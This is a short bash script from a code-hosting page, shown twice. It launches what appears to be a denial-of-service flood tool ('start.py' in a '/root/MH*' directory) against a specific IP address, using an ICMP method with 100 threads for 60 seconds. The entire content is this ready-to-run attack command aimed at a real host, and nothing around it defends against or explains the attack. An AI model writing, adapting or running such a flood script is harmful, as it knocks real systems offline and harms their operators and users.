3 lines
73 B
Bash
3 lines
73 B
Bash
#!/bin/bash
|
|
cd /root/MH*
|
|
python3 start.py ICMP 178.161.151.73 100 60 true |
#!/bin/bash
|
|
cd /root/MH*
|
|
python3 start.py ICMP 178.161.151.73 100 60 true |